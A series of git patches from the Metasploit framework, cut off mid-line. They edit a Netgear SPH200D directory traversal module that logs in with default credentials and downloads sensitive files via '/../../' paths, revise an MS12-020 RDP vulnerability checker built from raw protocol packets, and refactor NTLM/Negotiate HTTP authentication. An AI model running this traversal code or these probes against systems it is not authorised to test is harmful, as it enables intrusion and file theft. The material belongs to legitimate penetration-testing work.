OptPath.new('SENSITIVE_FILES', [ true, "File containing senstive files, one per line", + OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), - ], self.class) end def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] - end - save_array = words.split(/\r?\n/) - return save_array + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read + end + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array end - def find_files(files,user,pass) + #traversal every file + def find_files(file,user,pass) traversal = '/../..' - res = send_request_raw( - { - 'method' => 'GET', - 'uri' => traversal << files, - 'basic_auth' => "#{user}:#{pass}" + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => traversal << file, + 'basic_auth' => "#{user}:#{pass}" + }) + + if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) + print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}! Response: \r\n #{res.body}") + report_web_vuln({ + :host => rhost, + :port => rport, + :vhost => datastore['VHOST'], + :path => traversal << file, + :pname => traversal, + :risk => 3, + :proof => traversal, + :name => self.fullname, + :category => "web", + :method => "GET" }) - if (res and res.code == 200) - print_status("Request may have succeeded on #{rhost}:#{rport}:file->#{files}! Response: \r\n") - print_status("#{res.body}") + + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + print_good("File #{file} downloaded to: #{loot}") elsif (res and res.code) - vprint_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport}:file->#{files}") + vprint_error("Attempt returned HTTP error #{res.code} and Body #{res.body} on #{rhost}:#{rport}:file->#{file}") end end @@ -85,50 +92,43 @@ def run_host(ip) pass = datastore['PASSWORD'] end - print_status("Trying to login with #{user} / #{pass}") - - begin - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - end + print_status("Trying to login with #{user} / #{pass}") + + #test login + begin + res = send_request_cgi({ + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) - return :abort if (res.code == 404) + return :abort if (res.code == 404) - if [200, 301, 302].include?(res.code) - print_good("SUCCESSFUL LOGIN. '#{user}' : '#{pass}'") - else - print_error("NO SUCCESSFUL LOGIN POSSIBLE. '#{user}' : '#{pass}'") - return :abort - end + if [200, 301, 302].include?(res.code) + vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") + else + vprint_error("No successful login possible. #{user} : #{pass} on #{rhost}:#{rport}") + return :abort + end - rescue ::Rex::ConnectionError - vprint_error("Failed to connect to the web server") - return :abort - end + rescue ::Rex::ConnectionError + vprint_error("Failed to connect to the web server") + return :abort + end begin - print_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_raw( - { + vprint_status("Attempting to connect to #{rhost}:#{rport}") + res = send_request_cgi({ + 'uri' => '/', 'method' => 'GET', - 'uri' => '/', 'basic_auth' => "#{user}:#{pass}" - }) - + }) if (res) - extract_words(datastore['SENSITIVE_FILES']).each do |files| - find_files(files,user,pass) unless files.empty? + extract_words(datastore['FILELIST']).each do |file| + find_files(file,user,pass) unless file.empty? end end - - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - rescue ::Timeout::Error, ::Errno::EPIPE + end end end From fdd5fe77c12917b3264f95f44d8f451af90fd95c Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 19:59:19 +0100 Subject: [PATCH 220/421] more updates ... --- .../admin/http/netgear_sph200d_traversal.rb | 21 +++---------------- 1 file changed, 3 insertions(+), 18 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index d9a0a23fd809..693bc5cf1343 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -86,11 +86,7 @@ def find_files(file,user,pass) def run_host(ip) user = datastore['USERNAME'] - if datastore['PASSWORD'].nil? - pass = "" - else - pass = datastore['PASSWORD'] - end + pass = datastore['PASSWORD'] print_status("Trying to login with #{user} / #{pass}") @@ -116,19 +112,8 @@ def run_host(ip) return :abort end - begin - vprint_status("Attempting to connect to #{rhost}:#{rport}") - res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) - if (res) - extract_words(datastore['FILELIST']).each do |file| - find_files(file,user,pass) unless file.empty? - end - end - + extract_words(datastore['FILELIST']).each do |file| + find_files(file,user,pass) unless file.empty? end end end From 988761a6dea9018955f65fec9652ba47126ebf2e Mon Sep 17 00:00:00 2001 From: m-1-k-3 <michael.messner@integralis.com> Date: Fri, 1 Feb 2013 20:18:53 +0100 Subject: [PATCH 221/421] more updates, BID, Exploit-DB --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 693bc5cf1343..1bf1be8c3314 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -25,6 +25,8 @@ def initialize [ [ 'URL', 'http://support.netgear.com/product/SPH200D' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], + [ 'BID', '57660' ], + [ 'EDB', '24441' ], ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE @@ -63,7 +65,8 @@ def find_files(file,user,pass) }) if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) - print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}! Response: \r\n #{res.body}") + print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}!") + vprint_status("Response: \r\n #{res.body}") report_web_vuln({ :host => rhost, :port => rport, @@ -99,6 +102,7 @@ def run_host(ip) }) return :abort if (res.code == 404) + return :abort if res.nil? if [200, 301, 302].include?(res.code) vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") From 7b6d1f4fdde26fe8dfd7ca3e7da3ee42c1379c38 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <todb@metasploit.com> Date: Fri, 1 Feb 2013 13:36:15 -0600 Subject: [PATCH 222/421] Actually test alternate rubies. --- tools/msftidy.rb | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tools/msftidy.rb b/tools/msftidy.rb index aa63bea6a476..d8ee2651113f 100755 --- a/tools/msftidy.rb +++ b/tools/msftidy.rb @@ -226,9 +226,7 @@ def test_old_rubies(f_rel) puts "Checking syntax for #{f_rel}." rubies ||= RVM.list_strings res = %x{rvm all do ruby -c #{f_rel}}.split("\n").select {|msg| msg =~ /Syntax OK/} - rubies.size == res.size - - error("Fails alternate Ruby version check") if rubies.size + error("Fails alternate Ruby version check") if rubies.size != res.size end def check_ranking From 152f397a1f8a2df61fdf07713159aa77f5138f88 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:38:11 +0100 Subject: [PATCH 223/421] first module cleanup --- .../admin/http/netgear_sph200d_traversal.rb | 81 +++++++++---------- 1 file changed, 39 insertions(+), 42 deletions(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 1bf1be8c3314..fdf30c879eb4 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -14,19 +14,17 @@ class Metasploit3 < Msf::Auxiliary def initialize super( - 'Name' => 'Netgear SPH200D - Directory Traversal Vulnerability', + 'Name' => 'Netgear SPH200D Directory Traversal Vulnerability', 'Description' => %q{ - This module exploits a directory traversal vulnerablity which is present - in Netgear SPH200D Skype telephone - You may wish to change SENSITIVE_FILES (hosts sensitive files), RPORT depending - on your environment. - }, + This module exploits a directory traversal vulnerablity which is present in + Netgear SPH200D Skype telephone. + }, 'References' => [ - [ 'URL', 'http://support.netgear.com/product/SPH200D' ], - [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ], [ 'BID', '57660' ], [ 'EDB', '24441' ], + [ 'URL', 'http://support.netgear.com/product/SPH200D' ], + [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-002' ] ], 'Author' => [ 'm-1-k-3' ], 'License' => MSF_LICENSE @@ -37,53 +35,52 @@ def initialize OptPath.new('FILELIST', [ true, "File containing sensitive files, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "sensitive_files.txt") ]), OptString.new('USERNAME',[ true, 'User to login with', 'admin']), - OptString.new('PASSWORD',[ true, 'Password to login with', 'password']), + OptString.new('PASSWORD',[ true, 'Password to login with', 'password']) ], self.class) end def extract_words(wordfile) - return [] unless wordfile && File.readable?(wordfile) - begin - words = File.open(wordfile, "rb") do |f| - f.read - end - rescue - return [] + return [] unless wordfile && File.readable?(wordfile) + begin + words = File.open(wordfile, "rb") do |f| + f.read end - save_array = words.split(/\r?\n/) - return save_array + rescue + return [] + end + save_array = words.split(/\r?\n/) + return save_array end #traversal every file def find_files(file,user,pass) - traversal = '/../..' + traversal = '/../../' res = send_request_cgi({ - 'method' => 'GET', - 'uri' => traversal << file, + 'method' => 'GET', + 'uri' => normalize_uri(traversal, file), 'basic_auth' => "#{user}:#{pass}" - }) + }) - if (res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/) - print_good("Request may have succeeded on #{rhost}:#{rport}:file->#{file}!") - vprint_status("Response: \r\n #{res.body}") + if res and res.code == 200 and res.body !~ /404\ File\ Not\ Found/ + print_good("#{rhost}:#{rport} - Request may have succeeded on file #{file}") report_web_vuln({ :host => rhost, :port => rport, :vhost => datastore['VHOST'], - :path => traversal << file, - :pname => traversal, + :path => "/", + :pname => normalize_uri(traversal, file), :risk => 3, - :proof => traversal, + :proof => normalize_uri(traversal, file), :name => self.fullname, :category => "web", :method => "GET" - }) + }) - loot = store_loot("lfi.data","text/plain",rhost, res.body,file) - print_good("File #{file} downloaded to: #{loot}") - elsif (res and res.code) - vprint_error("Attempt returned HTTP error #{res.code} and Body #{res.body} on #{rhost}:#{rport}:file->#{file}") + loot = store_loot("lfi.data","text/plain",rhost, res.body,file) + vprint_good("#{rhost}:#{rport} - File #{file} downloaded to: #{loot}") + elsif res and res.code + vprint_error("#{rhost}:#{rport} - Attempt returned HTTP error #{res.code} when trying to access #{file}") end end @@ -96,24 +93,24 @@ def run_host(ip) #test login begin res = send_request_cgi({ - 'uri' => '/', - 'method' => 'GET', - 'basic_auth' => "#{user}:#{pass}" - }) + 'uri' => '/', + 'method' => 'GET', + 'basic_auth' => "#{user}:#{pass}" + }) - return :abort if (res.code == 404) return :abort if res.nil? + return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) - vprint_good("Successful login: #{user} : #{pass} on #{rhost}:#{rport}") + vprint_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else - vprint_error("No successful login possible. #{user} : #{pass} on #{rhost}:#{rport}") + vprint_error("#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") return :abort end rescue ::Rex::ConnectionError - vprint_error("Failed to connect to the web server") - return :abort + vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") + return :abort end extract_words(datastore['FILELIST']).each do |file| From 996ee06b0fc79aa621f953058f2048d9aea02f72 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:43:54 +0100 Subject: [PATCH 224/421] fix another print_ call --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index fdf30c879eb4..478a0c39da78 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -88,7 +88,7 @@ def run_host(ip) user = datastore['USERNAME'] pass = datastore['PASSWORD'] - print_status("Trying to login with #{user} / #{pass}") + vprint_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") #test login begin From c24c926ffaa1da011df5e38dd36e3ad48d8b7e59 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Fri, 1 Feb 2013 20:55:06 +0100 Subject: [PATCH 225/421] add aditional check to detect valid device --- modules/auxiliary/admin/http/netgear_sph200d_traversal.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb index 478a0c39da78..311bb838967b 100644 --- a/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb +++ b/modules/auxiliary/admin/http/netgear_sph200d_traversal.rb @@ -99,6 +99,7 @@ def run_host(ip) }) return :abort if res.nil? + return :abort if (res.headers['Server'].nil? or res.headers['Server'] !~ /simple httpd/) return :abort if (res.code == 404) if [200, 301, 302].include?(res.code) From 4e6c93ec7da76593a356eb859dea31eed96b2924 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 14:38:20 -0600 Subject: [PATCH 226/421] Various style fixes, fix ruby 1.8 compat --- .../auxiliary/scanner/rdp/ms12-020_check.rb | 224 ++++++++---------- 1 file changed, 102 insertions(+), 122 deletions(-) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12-020_check.rb index 93dc4bc58ab8..5a16d3685162 100644 --- a/modules/auxiliary/scanner/rdp/ms12-020_check.rb +++ b/modules/auxiliary/scanner/rdp/ms12-020_check.rb @@ -33,7 +33,7 @@ def initialize(info = {}) 'Royce Davis @R3dy_ <rdavis[at]accuvant.com>', 'Brandon McCann @zeknox <bmccann[at]accuvant.com>' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE )) register_options( @@ -42,36 +42,18 @@ def initialize(info = {}) ], self.class) end - def checkRdp(packet) + def check_rdp # code to check if RDP is open or not - vprint_status("#{peer} - Verifying RDP Protocol") - begin - # send connection - sock.put(packet) - # read packet to see if its rdp - res = sock.recv(1024) - - if res.unpack("H*").join == "0300000b06d00000123400" - return true - else - return false - end - rescue - print_error("could not connect to RHOST") - return false - end - end + vprint_status("#{peer} Verifying RDP protocol...") + + # send connection + sock.put(connection_request) + + # read packet to see if its rdp + res = sock.get_once(-1, 5) - def connectionRequest() - packet = '' + - "\x03\x00" + # TPKT Header version 03, reserved 0 - "\x00\x0b" + # Length - "\x06" + # X.224 Data TPDU length - "\xe0" + # X.224 Type (Connection request) - "\x00\x00" + # dst reference - "\x00\x00" + # src reference - "\x00" # class and options - return packet + # return true if this matches our vulnerable response + ( res and res == "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" ) end def report_goods @@ -79,120 +61,118 @@ def report_goods :host => rhost, :port => rport, :proto => 'tcp', - :name => 'The MS12-020 Checker', - :vuln => 'Confirmaiton that this host is vulnerable to MS12-020', - :refs => self.references, - :exploited_at => Time.now.utc + :name => self.name, + :info => 'Response indicates a missing patch', + :refs => self.references ) end - def connectInitial() - packet = '' + - "\x03\x00\x00\x65" + # TPKT Header - "\x02\xf0\x80" + # Data TPDU, EOT - "\x7f\x65\x5b" + # Connect-Initial - "\x04\x01\x01" + # callingDomainSelector - "\x04\x01\x01" + # callingDomainSelector - "\x01\x01\xff" + # upwardFlag - "\x30\x19" + # targetParams + size - "\x02\x01\x22" + # maxChannelIds - "\x02\x01\x20" + # maxUserIds - "\x02\x01\x00" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x18" + # minParams + size - "\x02\x01\x01" + # maxChannelIds - "\x02\x01\x01" + # maxUserIds - "\x02\x01\x01" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x01\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x30\x19" + # maxParams + size - "\x02\x01\xff" + # maxChannelIds - "\x02\x01\xff" + # maxUserIds - "\x02\x01\xff" + # maxTokenIds - "\x02\x01\x01" + # numPriorities - "\x02\x01\x00" + # minThroughput - "\x02\x01\x01" + # maxHeight - "\x02\x02\xff\xff" + # maxMCSPDUSize - "\x02\x01\x02" + # protocolVersion - "\x04\x00" # userData - return packet + def connection_request + "\x03\x00" + # TPKT Header version 03, reserved 0 + "\x00\x0b" + # Length + "\x06" + # X.224 Data TPDU length + "\xe0" + # X.224 Type (Connection request) + "\x00\x00" + # dst reference + "\x00\x00" + # src reference + "\x00" # class and options end - def userRequest() - packet = '' + - "\x03\x00" + # header - "\x00\x08" + # length - "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) - "\x28" # PER encoded PDU contents - return packet + def connect_initial + "\x03\x00\x00\x65" + # TPKT Header + "\x02\xf0\x80" + # Data TPDU, EOT + "\x7f\x65\x5b" + # Connect-Initial + "\x04\x01\x01" + # callingDomainSelector + "\x04\x01\x01" + # callingDomainSelector + "\x01\x01\xff" + # upwardFlag + "\x30\x19" + # targetParams + size + "\x02\x01\x22" + # maxChannelIds + "\x02\x01\x20" + # maxUserIds + "\x02\x01\x00" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x18" + # minParams + size + "\x02\x01\x01" + # maxChannelIds + "\x02\x01\x01" + # maxUserIds + "\x02\x01\x01" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x01\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x30\x19" + # maxParams + size + "\x02\x01\xff" + # maxChannelIds + "\x02\x01\xff" + # maxUserIds + "\x02\x01\xff" + # maxTokenIds + "\x02\x01\x01" + # numPriorities + "\x02\x01\x00" + # minThroughput + "\x02\x01\x01" + # maxHeight + "\x02\x02\xff\xff" + # maxMCSPDUSize + "\x02\x01\x02" + # protocolVersion + "\x04\x00" # userData end - def channelRequestOne - packet = '' + - "\x03\x00\x00\x0c" + - "\x02\xf0\x80\x38" + - "\x00\x01\x03\xeb" - return packet + def user_request + "\x03\x00" + # header + "\x00\x08" + # length + "\x02\xf0\x80" + # X.224 Data TPDU (2 bytes: 0xf0 = Data TPDU, 0x80 = EOT, end of transmission) + "\x28" # PER encoded PDU contents end - def channelRequestTwo - packet = '' + - "\x03\x00\x00\x0c" + - "\x02\xf0\x80\x38" + - "\x00\x02\x03\xeb" - return packet + def channel_request_one + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x01\x03\xeb" + end + + def channel_request_two + "\x03\x00\x00\x0c" + + "\x02\xf0\x80\x38" + + "\x00\x02\x03\xeb" end def peer - return "#{rhost}:#{rport}" + "#{rhost}:#{rport}" end def run_host(ip) - begin - # open connection - connect() - rescue + + connect + + # check if rdp is open + if not check_rdp + disconnect return end - # check if rdp is open - if checkRdp(connectionRequest) - - # send connectInitial - sock.put(connectInitial) - # send userRequest - sock.put(userRequest) - user1_res = sock.recv(1024) - # send 2nd userRequest - sock.put(userRequest) - user2_res = sock.recv(1024) - # send channel request one - sock.put(channelRequestOne) - channel_one_res = sock.recv(1024) - if channel_one_res.unpack("H*").to_s[16..19] == '3e00' - # vulnerable - print_good("#{peer} - Vulnerable to MS12-020") - report_goods - - # send ChannelRequestTwo - prevent bsod - sock.put(channelRequestTwo) - - # report to the database - else - vprint_error("#{peer} - Not Vulnerable") - end + # send connectInitial + sock.put(connect_initial) + + # send userRequest + sock.put(user_request) + res = sock.get_once(-1, 5) + + # send 2nd userRequest + sock.put(user_request) + res = sock.get_once(-1, 5) + # send channel request one + sock.put(channel_request_one) + res = sock.get_once(-1, 5) + + if res and res[8,2] == "\x3e\x00" + # send ChannelRequestTwo - prevent BSoD + sock.put(channel_request_two) + + print_good("#{peer} Vulnerable to MS12-020") + report_goods + else + vprint_status("#{peer} Not Vulnerable") end - # close connection + disconnect() end end - From d5ae0053323c61a04220d3e6e28ab92150622df6 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 14:39:01 -0600 Subject: [PATCH 227/421] Rename with underscores --- .../scanner/rdp/{ms12-020_check.rb => ms12_020_check.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/rdp/{ms12-020_check.rb => ms12_020_check.rb} (100%) diff --git a/modules/auxiliary/scanner/rdp/ms12-020_check.rb b/modules/auxiliary/scanner/rdp/ms12_020_check.rb similarity index 100% rename from modules/auxiliary/scanner/rdp/ms12-020_check.rb rename to modules/auxiliary/scanner/rdp/ms12_020_check.rb From a63cf6977c4ccd59b5441c4bfa5666a8a8b4b639 Mon Sep 17 00:00:00 2001 From: HD Moore <hd_moore@rapid7.com> Date: Fri, 1 Feb 2013 13:30:39 -0600 Subject: [PATCH 228/421] Fix 1.8 support --- modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index c405327ab0f6..ef6906721ed8 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -49,7 +49,7 @@ def initialize(info={}) ['Automatic Targeting', { 'auto' => true }] ], 'DefaultTarget' => 0, - 'DisclosureDate' => "Jan 22 2013", + 'DisclosureDate' => "Jan 22 2013" )) register_options([ @@ -145,4 +145,3 @@ def exploit end end - From 8e870f3654891a7a4dae5959dc41d5ed0c709b0f Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 10:59:38 -0600 Subject: [PATCH 229/421] merge in sinn3r's changes --- lib/msf/core/exploit/http/client.rb | 259 +++++++++++++++++----------- 1 file changed, 161 insertions(+), 98 deletions(-) diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 6d0bd9336b51..4608b38416a4 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -281,103 +281,6 @@ def basic_auth datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') end - # - # Connect to the server, and perform NTLM authentication for this session. - # Note the return value is [resp,c], so the caller can have access to both - # the last response, and the connection itself -- this is important since - # NTLM auth is bound to this particular TCP session. - # - # TODO: Fix up error messaging a lot more -- right now it's pretty hard - # to tell what all went wrong. - # - def send_http_auth_ntlm(opts={}, timeout = 20) - #ntlm_message_1 = "NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=" - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - ntlm_message_1 = "NTLM " + Rex::Text::encode_base64(NTLM_UTILS::make_ntlmssp_blob_init( domain_name, - workstation_name, - ntlmssp_flags)) - to = opts[:timeout] || timeout - begin - c = connect(opts) - - # First request to get the challenge - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => ntlm_message_1 }})) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [nil,nil] unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].match(/NTLM ([A-Z0-9\x2b\x2f=]+)/i)[1] - return [nil,nil] unless ntlm_challenge - - - #old and simplier method but not compatible with windows 7/2008r2 - #ntlm_message_2 = Rex::Proto::NTLM::Message.decode64(ntlm_challenge) - #ntlm_message_3 = ntlm_message_2.response( {:user => opts['username'],:password => opts['password']}, {:ntlmv2 => true}) - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - #netbios name - default_name = blob_data[:default_name] || '' - #netbios domain - default_domain = blob_data[:default_domain] || '' - #dns name - dns_host_name = blob_data[:dns_host_name] || '' - #dns domain - dns_domain_name = blob_data[:dns_domain_name] || '' - #Client time - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, - resp_ntlm, - client_challenge, - ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses(opts['username'], opts['password'], challenge_key, - domain_name, default_name, default_domain, - dns_host_name, dns_domain_name, chall_MsvAvTimestamp, - spnopt, ntlm_options) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth(domain_name, workstation_name, opts['username'], - resp_lm, resp_ntlm, '', ntlmssp_flags) - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - r = c.request_cgi(opts.merge({ - 'uri' => opts['uri'], - 'method' => 'GET', - 'headers' => { 'Authorization' => "NTLM #{ntlm_message_3}"}})) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - def send_digest_request_cgi(opts={}, timeout=20) @nonce_count = 0 @@ -514,6 +417,166 @@ def send_digest_request_cgi(opts={}, timeout=20) end end + + # + # Authenticates to the remote host based on the most appropriate authentication method, + # and returns the HTTP response. If there are multiple auth methods supported, then it + # will pick one in the following order: Basic, Digest, Negotiate, and then NTLM. + # + # Options: + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_smart_auth(opts={}, timeout=20) + res = send_request_cgi(opts,timeout) + return nil if res.nil? + return res unless res.code == 401 + return res if opts['username'].blank? + return res unless res.headers['WWW-Authenticate'] + + if res.headers['WWW-Authenticate'].include? "Basic" + opts['basic_auth'] = opts['username'] + ":" + opts['password'] + res = send_request_cgi(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "Digest" + opts['DigestAuthUser'] = opts['username'] + opts['DigestAuthPassword'] = opts['password'] + res, c = send_digest_request_cgi(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "Negotiate" + opts['provider'] = 'Negotiate' + res = send_request_auth_negotiate(opts,timeout) + return res + + elsif res.headers['WWW-Authenticate'].include? "NTLM" + opts['provider'] = 'NTLM' + res = send_request_auth_negotiate(opts,timeout) + return res + + end + + return nil + end + + + # + # Handles both generic Negotiate and NTLM providers + # This does not send back the client, instead it expects that you will + # handshake for each request sent. While this does create additional + # overhead on the wire, it makes dealing with the requests much easier + # from a code point of view. + # + # Options: + # - method: HTTP method, default: GET + # - headers: HTTP headers as a hash + # - provider: HTTP authentication provider, default: 'NTLM ' + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_auth_negotiate(opts ={}, timeout =20) + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + to = opts['timeout'] || timeout + + begin + c = connect(opts) + + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = c.request_cgi(opts) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = 